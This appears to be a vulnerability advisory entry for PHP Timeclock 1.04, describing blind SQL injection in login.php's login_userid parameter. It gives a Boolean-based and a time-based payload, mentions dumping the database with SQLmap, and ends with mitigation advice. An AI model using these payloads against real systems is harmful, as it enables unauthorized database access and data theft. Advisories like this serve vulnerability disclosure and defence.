vendor:
PHP Timeclock
by:
Tyler Butler
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Timeclock
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: NO
Related CWE: N/A
CPE: a:timeclock:php_timeclock:1.04
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5
2021
PHP Timeclock 1.04 – Time and Boolean Based Blind SQL Injection
PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents. Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass. Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass.
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.